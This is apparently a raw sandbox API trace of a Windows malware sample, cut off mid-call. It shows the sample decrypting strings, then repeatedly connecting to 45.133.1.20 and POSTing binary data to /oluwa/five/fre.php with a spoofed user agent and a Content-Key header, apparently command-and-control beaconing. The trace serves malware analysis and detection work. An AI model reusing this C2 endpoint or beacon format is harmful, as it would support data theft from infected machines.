0x74810000 [0265.448] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0265.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.450] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.451] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.451] GetProcessHeap () returned 0x6a0000 [0265.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0265.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.453] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0265.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.454] CryptDestroyKey (hKey=0x6ad020) returned 1 [0265.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.456] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0265.456] GetProcessHeap () returned 0x6a0000 [0265.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0265.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.457] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0265.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.458] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0265.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.460] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0265.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.461] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0265.461] GetProcessHeap () returned 0x6a0000 [0265.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0265.461] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0265.461] GetProcessHeap () returned 0x6a0000 [0265.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0265.462] GetProcessHeap () returned 0x6a0000 [0265.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0265.462] GetProcessHeap () returned 0x6a0000 [0265.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0265.462] GetProcessHeap () returned 0x6a0000 [0265.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0265.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.464] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.490] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0265.502] GetProcessHeap () returned 0x6a0000 [0265.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0265.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.507] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0265.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.509] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.516] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.516] GetProcessHeap () returned 0x6a0000 [0265.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0265.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.518] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0265.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.520] CryptDestroyKey (hKey=0x6ad020) returned 1 [0265.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.521] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0265.521] GetProcessHeap () returned 0x6a0000 [0265.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0265.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.522] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0265.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.523] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0265.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.525] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0265.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.526] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0265.526] GetProcessHeap () returned 0x6a0000 [0265.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0265.526] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0265.526] GetProcessHeap () returned 0x6a0000 [0265.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0265.526] socket (af=2, type=1, protocol=6) returned 0x930 [0265.527] connect (s=0x930, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0265.556] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0265.556] GetProcessHeap () returned 0x6a0000 [0265.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0265.556] GetProcessHeap () returned 0x6a0000 [0265.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0265.557] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0265.558] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0265.558] GetProcessHeap () returned 0x6a0000 [0265.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9930 [0265.559] GetProcessHeap () returned 0x6a0000 [0265.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0265.559] GetProcessHeap () returned 0x6a0000 [0265.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0265.559] GetProcessHeap () returned 0x6a0000 [0265.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0265.560] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0265.561] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0265.561] GetProcessHeap () returned 0x6a0000 [0265.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0265.561] GetProcessHeap () returned 0x6a0000 [0265.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0265.562] send (s=0x930, buf=0x6bd460*, len=242, flags=0) returned 242 [0265.563] send (s=0x930, buf=0x6bb998*, len=159, flags=0) returned 159 [0265.563] GetProcessHeap () returned 0x6a0000 [0265.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0265.563] recv (in: s=0x930, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0265.636] GetProcessHeap () returned 0x6a0000 [0265.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0265.637] GetProcessHeap () returned 0x6a0000 [0265.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0265.637] GetProcessHeap () returned 0x6a0000 [0265.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9930 | out: hHeap=0x6a0000) returned 1 [0265.637] GetProcessHeap () returned 0x6a0000 [0265.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0265.638] closesocket (s=0x930) returned 0 [0265.639] GetProcessHeap () returned 0x6a0000 [0265.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0265.640] GetProcessHeap () returned 0x6a0000 [0265.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0265.640] GetProcessHeap () returned 0x6a0000 [0265.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0265.641] GetProcessHeap () returned 0x6a0000 [0265.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0265.642] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16a8) returned 0x930 [0265.644] Sleep (dwMilliseconds=0xea60) [0265.645] GetProcessHeap () returned 0x6a0000 [0265.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0265.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.647] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.653] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0265.659] GetProcessHeap () returned 0x6a0000 [0265.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0265.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.660] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0265.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.664] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.665] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.665] GetProcessHeap () returned 0x6a0000 [0265.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0265.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.667] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0265.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.668] CryptDestroyKey (hKey=0x6ad060) returned 1 [0265.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.669] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0265.669] GetProcessHeap () returned 0x6a0000 [0265.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0265.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.674] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0265.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.675] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0265.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.676] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0265.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.683] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0265.683] GetProcessHeap () returned 0x6a0000 [0265.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0265.683] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0265.683] GetProcessHeap () returned 0x6a0000 [0265.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0265.684] GetProcessHeap () returned 0x6a0000 [0265.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0265.684] GetProcessHeap () returned 0x6a0000 [0265.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0265.685] GetProcessHeap () returned 0x6a0000 [0265.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0265.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.686] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.692] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0265.700] GetProcessHeap () returned 0x6a0000 [0265.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0265.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.701] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0265.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.702] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.705] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.705] GetProcessHeap () returned 0x6a0000 [0265.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0265.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.707] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0265.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.708] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0265.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.709] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0265.709] GetProcessHeap () returned 0x6a0000 [0265.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0265.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.710] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0265.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.711] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0265.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.712] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0265.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.714] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0265.714] GetProcessHeap () returned 0x6a0000 [0265.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0265.714] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0265.714] GetProcessHeap () returned 0x6a0000 [0265.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0265.714] socket (af=2, type=1, protocol=6) returned 0x934 [0265.718] connect (s=0x934, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0265.740] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0265.740] GetProcessHeap () returned 0x6a0000 [0265.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0265.740] GetProcessHeap () returned 0x6a0000 [0265.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0265.741] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0265.742] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0265.742] GetProcessHeap () returned 0x6a0000 [0265.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0265.742] GetProcessHeap () returned 0x6a0000 [0265.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0265.743] GetProcessHeap () returned 0x6a0000 [0265.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0265.743] GetProcessHeap () returned 0x6a0000 [0265.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0265.744] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0265.745] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0265.745] GetProcessHeap () returned 0x6a0000 [0265.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0265.745] GetProcessHeap () returned 0x6a0000 [0265.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0265.746] send (s=0x934, buf=0x6bd460*, len=242, flags=0) returned 242 [0265.747] send (s=0x934, buf=0x6bb998*, len=159, flags=0) returned 159 [0265.747] GetProcessHeap () returned 0x6a0000 [0265.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0265.750] recv (in: s=0x934, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0265.821] GetProcessHeap () returned 0x6a0000 [0265.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0265.822] GetProcessHeap () returned 0x6a0000 [0265.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0265.824] GetProcessHeap () returned 0x6a0000 [0265.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0265.824] GetProcessHeap () returned 0x6a0000 [0265.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0265.824] closesocket (s=0x934) returned 0 [0265.826] GetProcessHeap () returned 0x6a0000 [0265.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0265.826] GetProcessHeap () returned 0x6a0000 [0265.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0265.827] GetProcessHeap () returned 0x6a0000 [0265.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0265.829] GetProcessHeap () returned 0x6a0000 [0265.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0265.835] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16b0) returned 0x934 [0265.840] Sleep (dwMilliseconds=0xea60) [0265.842] GetProcessHeap () returned 0x6a0000 [0265.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0265.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.844] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.861] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0265.870] GetProcessHeap () returned 0x6a0000 [0265.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0265.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.875] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0265.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.889] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.890] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.890] GetProcessHeap () returned 0x6a0000 [0265.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0265.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0265.892] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, 